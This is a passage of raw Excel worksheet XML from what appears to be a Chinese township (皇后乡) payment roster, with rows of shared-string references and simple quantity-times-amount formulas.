      <c r="J1968" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1968" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1969" customHeight="1" spans="1:11">
      <c r="A1969" s="16" t="s">
        <v>5235</v>
      </c>
      <c r="B1969" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1969" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1969" s="17" t="s">
        <v>5236</v>
      </c>
      <c r="E1969" s="17" t="s">
        <v>5237</v>
      </c>
      <c r="F1969" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1969" s="17">
        <v>1</v>
      </c>
      <c r="H1969" s="18">
        <v>365</v>
      </c>
      <c r="I1969" s="17">
        <f>H1969*G1969</f>
        <v>365</v>
      </c>
      <c r="J1969" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1969" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1970" customHeight="1" spans="1:11">
      <c r="A1970" s="16" t="s">
        <v>5238</v>
      </c>
      <c r="B1970" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1970" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1970" s="17" t="s">
        <v>5239</v>
      </c>
      <c r="E1970" s="17" t="s">
        <v>4788</v>
      </c>
      <c r="F1970" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1970" s="17">
        <v>2</v>
      </c>
      <c r="H1970" s="18">
        <v>325</v>
      </c>
      <c r="I1970" s="17">
        <f>H1970*G1970</f>
        <v>650</v>
      </c>
      <c r="J1970" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1970" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1971" customHeight="1" spans="1:11">
      <c r="A1971" s="16" t="s">
        <v>5240</v>
      </c>
      <c r="B1971" s="17" t="str">
        <f>B1970</f>
        <v>皇后乡</v>
      </c>
      <c r="C1971" s="17" t="str">
        <f>C1970</f>
        <v>皇后乡</v>
      </c>
      <c r="D1971" s="24" t="s">
        <v>5241</v>
      </c>
      <c r="E1971" s="24" t="s">
        <v>5242</v>
      </c>
      <c r="F1971" s="17" t="str">
        <f>F1970</f>
        <v>4113210615</v>
      </c>
      <c r="G1971" s="17"/>
      <c r="H1971" s="17"/>
      <c r="I1971" s="17"/>
      <c r="J1971" s="17"/>
      <c r="K1971" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1972" customHeight="1" spans="1:11">
      <c r="A1972" s="16" t="s">
        <v>5243</v>
      </c>
      <c r="B1972" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1972" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1972" s="17" t="s">
        <v>5244</v>
      </c>
      <c r="E1972" s="17" t="s">
        <v>5020</v>
      </c>
      <c r="F1972" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1972" s="17">
        <v>1</v>
      </c>
      <c r="H1972" s="18">
        <v>365</v>
      </c>
      <c r="I1972" s="17">
        <f>H1972*G1972</f>
        <v>365</v>
      </c>
      <c r="J1972" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1972" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1973" customHeight="1" spans="1:11">
      <c r="A1973" s="16" t="s">
        <v>5245</v>
      </c>
      <c r="B1973" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1973" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1973" s="17" t="s">
        <v>5246</v>
      </c>
      <c r="E1973" s="17" t="s">
        <v>5247</v>
      </c>
      <c r="F1973" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1973" s="17">
        <v>1</v>
      </c>
      <c r="H1973" s="18">
        <v>365</v>
      </c>
      <c r="I1973" s="17">
        <f>H1973*G1973</f>
        <v>365</v>
      </c>
      <c r="J1973" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1973" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1974" customHeight="1" spans="1:11">
      <c r="A1974" s="16" t="s">
        <v>5248</v>
      </c>
      <c r="B1974" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1974" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1974" s="17" t="s">
        <v>5249</v>
      </c>
      <c r="E1974" s="17" t="s">
        <v>4788</v>
      </c>
      <c r="F1974" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1974" s="17">
        <v>1</v>
      </c>
      <c r="H1974" s="18">
        <v>365</v>
      </c>
      <c r="I1974" s="17">
        <f>H1974*G1974</f>
        <v>365</v>
      </c>
      <c r="J1974" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1974" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1975" customHeight="1" spans="1:11">
      <c r="A1975" s="16" t="s">
        <v>5250</v>
      </c>
      <c r="B1975" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1975" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1975" s="17" t="s">
        <v>5251</v>
      </c>
      <c r="E1975" s="17" t="s">
        <v>4907</v>
      </c>
      <c r="F1975" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1975" s="17">
        <v>2</v>
      </c>
      <c r="H1975" s="18">
        <v>325</v>
      </c>
      <c r="I1975" s="17">
        <f>H1975*G1975</f>
        <v>650</v>
      </c>
      <c r="J1975" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1975" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1976" customHeight="1" spans="1:11">
      <c r="A1976" s="16" t="s">
        <v>5252</v>
      </c>
      <c r="B1976" s="17" t="str">
        <f>B1975</f>
        <v>皇后乡</v>
      </c>
      <c r="C1976" s="17" t="str">
        <f>C1975</f>
        <v>皇后乡</v>
      </c>
      <c r="D1976" s="16" t="s">
        <v>5253</v>
      </c>
      <c r="E1976" s="16" t="s">
        <v>5254</v>
      </c>
      <c r="F1976" s="17" t="str">
        <f>F1975</f>
        <v>4113210615</v>
      </c>
      <c r="G1976" s="17"/>
      <c r="H1976" s="17"/>
      <c r="I1976" s="17"/>
      <c r="J1976" s="17"/>
      <c r="K1976" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1977" customHeight="1" spans="1:11">
      <c r="A1977" s="16" t="s">
        <v>5255</v>
      </c>
      <c r="B1977" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1977" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1977" s="17" t="s">
        <v>5256</v>
      </c>
      <c r="E1977" s="17" t="s">
        <v>5257</v>
      </c>
      <c r="F1977" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1977" s="17">
        <v>2</v>
      </c>
      <c r="H1977" s="18">
        <v>345</v>
      </c>
      <c r="I1977" s="17">
        <f>H1977*G1977</f>
        <v>690</v>
      </c>
      <c r="J1977" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1977" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1978" customHeight="1" spans="1:11">
      <c r="A1978" s="16" t="s">
        <v>5258</v>
      </c>
      <c r="B1978" s="17" t="str">
        <f>B1977</f>
        <v>皇后乡</v>
      </c>
      <c r="C1978" s="17" t="str">
        <f>C1977</f>
        <v>皇后乡</v>
      </c>
      <c r="D1978" s="16" t="s">
        <v>5259</v>
      </c>
      <c r="E1978" s="17" t="s">
        <v>5260</v>
      </c>
      <c r="F1978" s="17" t="str">
        <f>F1977</f>
        <v>4113210615</v>
      </c>
      <c r="G1978" s="17"/>
      <c r="H1978" s="17"/>
      <c r="I1978" s="17"/>
      <c r="J1978" s="17"/>
      <c r="K1978" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1979" customHeight="1" spans="1:11">
      <c r="A1979" s="16" t="s">
        <v>5261</v>
      </c>
      <c r="B1979" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1979" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1979" s="17" t="s">
        <v>5262</v>
      </c>
      <c r="E1979" s="17" t="s">
        <v>4838</v>
      </c>
      <c r="F1979" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1979" s="17">
        <v>1</v>
      </c>
      <c r="H1979" s="18">
        <v>365</v>
      </c>
      <c r="I1979" s="17">
        <f>H1979*G1979</f>
        <v>365</v>
      </c>
      <c r="J1979" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1979" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1980" customHeight="1" spans="1:11">
      <c r="A1980" s="16" t="s">
        <v>5263</v>
      </c>
      <c r="B1980" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1980" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1980" s="17" t="s">
        <v>5264</v>
      </c>
      <c r="E1980" s="17" t="s">
        <v>4512</v>
      </c>
      <c r="F1980" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1980" s="17">
        <v>2</v>
      </c>
      <c r="H1980" s="18">
        <v>345</v>
      </c>
      <c r="I1980" s="17">
        <f>H1980*G1980</f>
        <v>690</v>
      </c>
      <c r="J1980" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1980" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1981" customHeight="1" spans="1:11">
      <c r="A1981" s="16" t="s">
        <v>5265</v>
      </c>
      <c r="B1981" s="17" t="str">
        <f>B1980</f>
        <v>皇后乡</v>
      </c>
      <c r="C1981" s="17" t="str">
        <f>C1980</f>
        <v>皇后乡</v>
      </c>
      <c r="D1981" s="16" t="s">
        <v>5266</v>
      </c>
      <c r="E1981" s="17" t="s">
        <v>4773</v>
      </c>
      <c r="F1981" s="17" t="str">
        <f>F1980</f>
        <v>4113210615</v>
      </c>
      <c r="G1981" s="17"/>
      <c r="H1981" s="17"/>
      <c r="I1981" s="17"/>
      <c r="J1981" s="17"/>
      <c r="K1981" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1982" customHeight="1" spans="1:11">
      <c r="A1982" s="16" t="s">
        <v>5267</v>
      </c>
      <c r="B1982" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1982" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1982" s="17" t="s">
        <v>5268</v>
      </c>
      <c r="E1982" s="17" t="s">
        <v>5269</v>
      </c>
      <c r="F1982" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1982" s="17">
        <v>1</v>
      </c>
      <c r="H1982" s="18">
        <v>365</v>
      </c>
      <c r="I1982" s="17">
        <f>H1982*G1982</f>
        <v>365</v>
      </c>
      <c r="J1982" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1982" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1983" customHeight="1" spans="1:11">
      <c r="A1983" s="16" t="s">
        <v>5270</v>
      </c>
      <c r="B1983" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1983" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1983" s="17" t="s">
        <v>5271</v>
      </c>
      <c r="E1983" s="17" t="s">
        <v>5272</v>
      </c>
      <c r="F1983" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1983" s="17">
        <v>1</v>
      </c>
      <c r="H1983" s="18">
        <v>365</v>
      </c>
      <c r="I1983" s="17">
        <f>H1983*G1983</f>
        <v>365</v>
      </c>
      <c r="J1983" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1983" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1984" customHeight="1" spans="1:11">
      <c r="A1984" s="16" t="s">
        <v>5273</v>
      </c>
      <c r="B1984" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1984" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1984" s="17" t="s">
        <v>5274</v>
      </c>
      <c r="E1984" s="17" t="s">
        <v>5275</v>
      </c>
      <c r="F1984" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1984" s="17">
        <v>4</v>
      </c>
      <c r="H1984" s="18">
        <v>285</v>
      </c>
      <c r="I1984" s="17">
        <f>H1984*G1984</f>
        <v>1140</v>
      </c>
      <c r="J1984" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1984" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1985" customHeight="1" spans="1:11">
      <c r="A1985" s="16" t="s">
        <v>5276</v>
      </c>
      <c r="B1985" s="17" t="str">
        <f>B1984</f>
        <v>皇后乡</v>
      </c>
      <c r="C1985" s="17" t="str">
        <f>C1984</f>
        <v>皇后乡</v>
      </c>
      <c r="D1985" s="16" t="s">
        <v>5277</v>
      </c>
      <c r="E1985" s="17" t="s">
        <v>5278</v>
      </c>
      <c r="F1985" s="17" t="str">
        <f>F1984</f>
        <v>4113210615</v>
      </c>
      <c r="G1985" s="17"/>
      <c r="H1985" s="17"/>
      <c r="I1985" s="17"/>
      <c r="J1985" s="17"/>
      <c r="K1985" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1986" customHeight="1" spans="1:11">
      <c r="A1986" s="16" t="s">
        <v>5279</v>
      </c>
      <c r="B1986" s="17" t="str">
        <f>B1985</f>
        <v>皇后乡</v>
      </c>
      <c r="C1986" s="17" t="str">
        <f>C1985</f>
        <v>皇后乡</v>
      </c>
      <c r="D1986" s="23" t="s">
        <v>5280</v>
      </c>
      <c r="E1986" s="19" t="s">
        <v>5281</v>
      </c>
      <c r="F1986" s="17" t="str">
        <f>F1985</f>
        <v>4113210615</v>
      </c>
      <c r="G1986" s="17"/>
      <c r="H1986" s="17"/>
      <c r="I1986" s="17"/>
      <c r="J1986" s="17"/>
      <c r="K1986" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1987" customHeight="1" spans="1:11">
      <c r="A1987" s="16" t="s">
        <v>5282</v>
      </c>
      <c r="B1987" s="17" t="str">
        <f>B1986</f>
        <v>皇后乡</v>
      </c>
      <c r="C1987" s="17" t="str">
        <f>C1986</f>
        <v>皇后乡</v>
      </c>
      <c r="D1987" s="23" t="s">
        <v>5283</v>
      </c>
      <c r="E1987" s="19" t="s">
        <v>2073</v>
      </c>
      <c r="F1987" s="17" t="str">
        <f>F1986</f>
        <v>4113210615</v>
      </c>
      <c r="G1987" s="17"/>
      <c r="H1987" s="17"/>
      <c r="I1987" s="17"/>
      <c r="J1987" s="17"/>
      <c r="K1987" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1988" customHeight="1" spans="1:11">
      <c r="A1988" s="16" t="s">
        <v>5284</v>
      </c>
      <c r="B1988" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1988" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1988" s="17" t="s">
        <v>5285</v>
      </c>
      <c r="E1988" s="17" t="s">
        <v>4773</v>
      </c>
      <c r="F1988" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1988" s="17">
        <v>1</v>
      </c>
      <c r="H1988" s="18">
        <v>365</v>
      </c>
      <c r="I1988" s="17">
        <f t="shared" ref="I1988:I1994" si="98">H1988*G1988</f>
        <v>365</v>
      </c>
      <c r="J1988" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1988" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1989" customHeight="1" spans="1:11">
      <c r="A1989" s="16" t="s">
        <v>5286</v>
      </c>
      <c r="B1989" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1989" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1989" s="17" t="s">
        <v>5287</v>
      </c>
      <c r="E1989" s="17" t="s">
        <v>4788</v>
      </c>
      <c r="F1989" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1989" s="17">
        <v>1</v>
      </c>
      <c r="H1989" s="18">
        <v>365</v>
      </c>
      <c r="I1989" s="17">
        <f t="shared" si="98"/>
        <v>365</v>
      </c>
      <c r="J1989" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1989" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1990" customHeight="1" spans="1:11">
      <c r="A1990" s="16" t="s">
        <v>5288</v>
      </c>
      <c r="B1990" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1990" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1990" s="17" t="s">
        <v>5289</v>
      </c>
      <c r="E1990" s="17" t="s">
        <v>2201</v>
      </c>
      <c r="F1990" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1990" s="17">
        <v>1</v>
      </c>
      <c r="H1990" s="18">
        <v>365</v>
      </c>
      <c r="I1990" s="17">
        <f t="shared" si="98"/>
        <v>365</v>
      </c>
      <c r="J1990" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1990" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1991" customHeight="1" spans="1:11">
      <c r="A1991" s="16" t="s">
        <v>5290</v>
      </c>
      <c r="B1991" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1991" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1991" s="17" t="s">
        <v>5291</v>
      </c>
      <c r="E1991" s="17" t="s">
        <v>4858</v>
      </c>
      <c r="F1991" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1991" s="17">
        <v>1</v>
      </c>
      <c r="H1991" s="18">
        <v>365</v>
      </c>
      <c r="I1991" s="17">
        <f t="shared" si="98"/>
        <v>365</v>
      </c>
      <c r="J1991" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1991" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1992" customHeight="1" spans="1:11">
      <c r="A1992" s="16" t="s">
        <v>5292</v>
      </c>
      <c r="B1992" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1992" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1992" s="17" t="s">
        <v>5293</v>
      </c>
      <c r="E1992" s="17" t="s">
        <v>4827</v>
      </c>
      <c r="F1992" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1992" s="17">
        <v>1</v>
      </c>
      <c r="H1992" s="18">
        <v>365</v>
      </c>
      <c r="I1992" s="17">
        <f t="shared" si="98"/>
        <v>365</v>
      </c>
      <c r="J1992" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1992" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1993" customHeight="1" spans="1:11">
      <c r="A1993" s="16" t="s">
        <v>5294</v>
      </c>
      <c r="B1993" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1993" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1993" s="17" t="s">
        <v>5295</v>
      </c>
      <c r="E1993" s="17" t="s">
        <v>4770</v>
      </c>
      <c r="F1993" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1993" s="17">
        <v>1</v>
      </c>
      <c r="H1993" s="18">
        <v>365</v>
      </c>
      <c r="I1993" s="17">
        <f t="shared" si="98"/>
        <v>365</v>
      </c>
      <c r="J1993" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1993" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1994" customHeight="1" spans="1:11">
      <c r="A1994" s="16" t="s">
        <v>5296</v>
      </c>
      <c r="B1994" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1994" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1994" s="17" t="s">
        <v>5297</v>
      </c>
      <c r="E1994" s="17" t="s">
        <v>4759</v>
      </c>
      <c r="F1994" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1994" s="17">
        <v>2</v>
      </c>
      <c r="H1994" s="18">
        <v>325</v>
      </c>
      <c r="I1994" s="17">
        <f t="shared" si="98"/>
        <v>650</v>
      </c>
      <c r="J1994" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1994" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1995" customHeight="1" spans="1:11">
      <c r="A1995" s="16" t="s">
        <v>5298</v>
      </c>
      <c r="B1995" s="17" t="str">
        <f>B1994</f>
        <v>皇后乡</v>
      </c>
      <c r="C1995" s="17" t="str">
        <f>C1994</f>
        <v>皇后乡</v>
      </c>
      <c r="D1995" s="24" t="s">
        <v>5299</v>
      </c>
      <c r="E1995" s="24" t="s">
        <v>4930</v>
      </c>
      <c r="F1995" s="17" t="str">
        <f>F1994</f>
        <v>4113210615</v>
      </c>
      <c r="G1995" s="17"/>
      <c r="H1995" s="17"/>
      <c r="I1995" s="17"/>
      <c r="J1995" s="17"/>
      <c r="K1995" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1996" customHeight="1" spans="1:11">
      <c r="A1996" s="16" t="s">
        <v>5300</v>
      </c>
      <c r="B1996" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1996" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1996" s="17" t="s">
        <v>5301</v>
      </c>
      <c r="E1996" s="17" t="s">
        <v>5302</v>
      </c>
      <c r="F1996" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1996" s="17">
        <v>1</v>
      </c>
      <c r="H1996" s="18">
        <v>365</v>
      </c>
      <c r="I1996" s="17">
        <f>H1996*G1996</f>
        <v>365</v>
      </c>
      <c r="J1996" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1996" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1997" customHeight="1" spans="1:11">
      <c r="A1997" s="16" t="s">
        <v>5303</v>
      </c>
      <c r="B1997" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1997" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1997" s="17" t="s">
        <v>5304</v>
      </c>
      <c r="E1997" s="17" t="s">
        <v>5305</v>
      </c>
      <c r="F1997" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1997" s="17">
        <v>2</v>
      </c>
      <c r="H1997" s="18">
        <v>325</v>
      </c>
      <c r="I1997" s="17">
        <f>H1997*G1997</f>
        <v>650</v>
      </c>
      <c r="J1997" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1997" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1998" customHeight="1" spans="1:11">
      <c r="A1998" s="16" t="s">
        <v>5306</v>
      </c>
      <c r="B1998" s="17" t="str">
        <f>B1997</f>
        <v>皇后乡</v>
      </c>
      <c r="C1998" s="17" t="str">
        <f>C1997</f>
        <v>皇后乡</v>
      </c>
      <c r="D1998" s="16" t="s">
        <v>5307</v>
      </c>
      <c r="E1998" s="16" t="s">
        <v>5308</v>
      </c>
      <c r="F1998" s="17" t="str">
        <f>F1997</f>
        <v>4113210615</v>
      </c>
      <c r="G1998" s="17"/>
      <c r="H1998" s="17"/>
      <c r="I1998" s="17"/>
      <c r="J1998" s="17"/>
      <c r="K1998" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1999" customHeight="1" spans="1:11">
      <c r="A1999" s="16" t="s">
        <v>5309</v>
      </c>
      <c r="B1999" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1999" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1999" s="17" t="s">
        <v>5310</v>
      </c>
      <c r="E1999" s="17" t="s">
        <v>4877</v>
      </c>
      <c r="F1999" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1999" s="17">
        <v>1</v>
      </c>
      <c r="H1999" s="18">
        <v>365</v>
      </c>
      <c r="I1999" s="17">
        <f t="shared" ref="I1999:I2004" si="99">H1999*G1999</f>
        <v>365</v>
      </c>
      <c r="J1999" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1999" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2000" customHeight="1" spans="1:11">
      <c r="A2000" s="16" t="s">
        <v>5311</v>
      </c>
      <c r="B2000" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2000" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2000" s="17" t="s">
        <v>5312</v>
      </c>
      <c r="E2000" s="17" t="s">
        <v>4824</v>
      </c>
      <c r="F2000" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2000" s="17">
        <v>1</v>
      </c>
      <c r="H2000" s="18">
        <v>365</v>
      </c>
      <c r="I2000" s="17">
        <f t="shared" si="99"/>
        <v>365</v>
      </c>
      <c r="J2000" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2000" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2001" customHeight="1" spans="1:11">
      <c r="A2001" s="16" t="s">
        <v>5313</v>
      </c>
      <c r="B2001" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2001" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2001" s="17" t="s">
        <v>5314</v>
      </c>
      <c r="E2001" s="17" t="s">
        <v>4997</v>
      </c>
      <c r="F2001" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2001" s="17">
        <v>1</v>
      </c>
      <c r="H2001" s="18">
        <v>365</v>
      </c>
      <c r="I2001" s="17">
        <f t="shared" si="99"/>
        <v>365</v>
      </c>
      <c r="J2001" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2001" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2002" customHeight="1" spans="1:11">
      <c r="A2002" s="16" t="s">
        <v>5315</v>
      </c>
      <c r="B2002" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2002" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2002" s="17" t="s">
        <v>5316</v>
      </c>
      <c r="E2002" s="17" t="s">
        <v>2201</v>
      </c>
      <c r="F2002" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2002" s="17">
        <v>1</v>
      </c>
      <c r="H2002" s="18">
        <v>365</v>
      </c>
      <c r="I2002" s="17">
        <f t="shared" si="99"/>
        <v>365</v>
      </c>
      <c r="J2002" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2002" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2003" customHeight="1" spans="1:11">
      <c r="A2003" s="16" t="s">
        <v>5317</v>
      </c>
      <c r="B2003" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2003" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2003" s="17" t="s">
        <v>5318</v>
      </c>
      <c r="E2003" s="17" t="s">
        <v>5272</v>
      </c>
      <c r="F2003" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2003" s="17">
        <v>1</v>
      </c>
      <c r="H2003" s="18">
        <v>365</v>
      </c>
      <c r="I2003" s="17">
        <f t="shared" si="99"/>
        <v>365</v>
      </c>
      <c r="J2003" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2003" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2004" customHeight="1" spans="1:11">
      <c r="A2004" s="16" t="s">
        <v>5319</v>
      </c>
      <c r="B2004" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2004" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2004" s="17" t="s">
        <v>5320</v>
      </c>
      <c r="E2004" s="17" t="s">
        <v>5321</v>
      </c>
      <c r="F2004" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2004" s="17">
        <v>2</v>
      </c>
      <c r="H2004" s="18">
        <v>325</v>
      </c>
      <c r="I2004" s="17">
        <f t="shared" si="99"/>
        <v>650</v>
      </c>
      <c r="J2004" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2004" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2005" customHeight="1" spans="1:11">
      <c r="A2005" s="16" t="s">
        <v>5322</v>
      </c>
      <c r="B2005" s="17" t="str">
        <f>B2004</f>
        <v>皇后乡</v>
      </c>
      <c r="C2005" s="17" t="str">
        <f>C2004</f>
        <v>皇后乡</v>
      </c>
      <c r="D2005" s="16" t="s">
        <v>5323</v>
      </c>
      <c r="E2005" s="16" t="s">
        <v>5324</v>
      </c>
      <c r="F2005" s="17" t="str">
        <f>F2004</f>
        <v>4113210615</v>
      </c>
      <c r="G2005" s="17"/>
      <c r="H2005" s="17"/>
      <c r="I2005" s="17"/>
      <c r="J2005" s="17"/>
      <c r="K2005" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2006" customHeight="1" spans="1:11">
      <c r="A2006" s="16" t="s">
        <v>5325</v>
      </c>
      <c r="B2006" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2006" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2006" s="17" t="s">
        <v>5326</v>
      </c>
      <c r="E2006" s="17" t="s">
        <v>4736</v>
      </c>
      <c r="F2006" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2006" s="17">
        <v>1</v>
      </c>
      <c r="H2006" s="18">
        <v>365</v>
      </c>
      <c r="I2006" s="17">
        <f>H2006*G2006</f>
        <v>365</v>
      </c>
      <c r="J2006" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2006" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2007" customHeight="1" spans="1:11">
      <c r="A2007" s="16" t="s">
        <v>5327</v>
      </c>
      <c r="B2007" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2007" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2007" s="17" t="s">
        <v>5328</v>
      </c>
      <c r="E2007" s="17" t="s">
        <v>4976</v>
      </c>
      <c r="F2007" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2007" s="17">
        <v>2</v>
      </c>
      <c r="H2007" s="18">
        <v>325</v>
      </c>
      <c r="I2007" s="17">
        <f>H2007*G2007</f>
        <v>650</v>
      </c>
      <c r="J2007" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2007" s="17" t="s">
